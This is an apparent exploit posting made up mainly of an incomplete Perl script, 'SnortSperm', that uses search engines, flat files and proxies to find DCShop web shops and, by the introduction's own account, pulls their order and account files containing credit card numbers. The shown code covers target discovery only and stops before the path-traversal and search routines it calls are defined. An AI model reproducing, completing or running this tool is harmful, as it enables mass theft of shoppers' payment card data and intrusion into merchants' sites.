The following program will search the Internet (using popular search engines) for vulnerable installations of DCShop. When it finds one, it will try and grab the order and account files (they contain both order details and credit card numbers).
Exploit Code:
--- ss.pl ---
#!/usr/bin/perl
#
# SnortSperm v1.1, a DCShop (Web shopping cart system) order and account scanner
# by darkman, with help of antistar and bsl4
# A proof of concept
#
# Users running windows have to download and install ActivePerl from
# www.activeperl.com, and run the script from the MS-DOS Prompt by typing:
#
# \perl\bin\perl <path of ss.pl>\ss.pl
#
# I'd like to thank Peter Helms for publishing the information regarding this
# exploit.
#
# E-mail: darkman@coderz.net
# Homepage: www.coderz.net/darkman
use LWP::Simple;
use LWP::UserAgent;
my $ua=new LWP::UserAgent;
# flush stdout (so we get 'in progress' messages)
$|=1;
# check arguements
foreach $opt (@ARGV) {
$proxyserver = $1 if ($opt =~ "proxy=(.*)");
$proxyport = $1 if ($opt =~ "port=(.*)");
$altavista = 1 if ($opt eq "altavista");
$google = 1 if ($opt eq "google");
$lycos = 1 if ($opt eq "lycos");
$nbci = 1 if ($opt eq "nbci");
$netscape = 1 if ($opt eq "netscape");
$yahoo = 1 if ($opt eq "yahoo");
$flatfiles{$1} = $1 if ($opt =~ "flatfile=(.*)");
$pathfiles{$1} = $1 if ($opt =~ "pathfile=(.*)");
}
print STDERR "SnortSperm v1.1, a DCShop (Web shopping cart system) order and account scanner\n";
# show options if no valid arguements were found
if (!($altavista or $google or $lycos or $nbci or $netscape or $yahoo) && (scalar keys %flatfiles==0)) {
print STDERR "usage: ./ss.pl <options>\n\nproxy=<proxyserver> for scanning using a proxy server\nport=<proxyport> for specifying proxy port (default proxy port is 8080)\naltavista for scanning using AltaVista\ngoogle for scanning using Google\nlycos for scanning using Lycos\nnbci for scanning using NBCi (use additional paths with this option)\nnetscape for scanning using Netscape Search\nyahoo for scanning using Yahoo!\nflatfile=<filename> for scanning using a flat file\npathfile=<filename> for additional paths\n\noptions can be combined";
exit;
}
# load additional paths
foreach $pathfile (keys %pathfiles) {
if ($pathfile ne '') {
open(FH, $pathfile);
while (<FH>) {
chomp;
$_ = $1 if (/(.*)\/$/);
$additional_paths{$_}=$_ if ($_ ne '');
}
}
}
# scan through a proxy (insert proxyserver and port)
if ($proxyserver) {
$proxyport = 8080 if (!$proxyport);
print STDERR "using $proxyserver:$proxyport as proxy\n";
$ua->proxy('http',"$proxyserver:$proxyport");
}
# scanning using selected search engines
if ($altavista) {
print STDERR "\nScanning using AltaVista";
$search_engine_url = "http://www.altavista.com";
$link = "status='([^']*)";
$next = "a href=\"([^\"]+).*\\[Next";
scan_search_engine("$search_engine_url/sites/search/web?q=DCShop&pg=q&kl=XX");
}
if ($google) {
print STDERR "\nScanning using Google";
$search_engine_url = "http://www.google.com";
$link = "<p><A HREF=([^>]*)";
$next = "A HREF=([^>]+).*<b>Next<\\/b>";
scan_search_engine("$search_engine_url/search?q=DCShop");
}
if ($lycos) {
print STDERR "\nScanning using Lycos";
$search_engine_url = "http://www.lycos.co.uk";
$link = "<b><a href=\"([^\"]*)";
$next = "A HREF=([^>]+).*<B>Forward<\\/B>";
scan_search_engine("$search_engine_url/cgi-bin/pursuit?matchmode=and&mtemp=main&etemp=error&query=DCShop&cat=lycos");
}
if ($nbci) {
print STDERR "\nScanning using NBCi";
$search_engine_url = "http://www.goto.com";
$link = "<em>([^<]*)";
$next = "a href=\"([^\"]+).*<b>More";
scan_search_engine("$search_engine_url/d/search/p/nbci/?Keywords=DCShop");
}
if ($netscape) {
print STDERR "\nScanning using Netscape Search";
$search_engine_url = "http://search.netscape.com";
$link = "size=\"1\">([^<]*)";
$next = "a href=\"([^\"]+).*next>>";
scan_search_engine("$search_engine_url/search.psp?cp=nsikwphopNetscape&charset=UTF-8&search=DCShop");
}
if ($yahoo) {
print STDERR "\nScanning using Yahoo!";
$search_engine_url = "http://google.yahoo.com";
$link = "#006600>([^&]*)";
$next = "a href=\"([^\"]+).*Next 20 ";
scan_search_engine("$search_engine_url/bin/query?p=DCShop&hc=0&hs=0");
}
# scanning using flat file(s)
foreach $flatfile (keys %flatfiles) {
if ($flatfile ne '') {
print STDERR "\nScanning using flat file: $flatfile";
open(FH, $flatfile);
while (<FH>) {
chomp;
$_ = $1 if (/(.*)\/$/);
path_traversal();
}
}
}
# show number of sites found
$total_urls = 4*scalar keys %unique_urls;
$total_sites = scalar keys %unique_sites;
print STDERR "\nFound $total_urls URLs at $total_sites sites to scan\n";
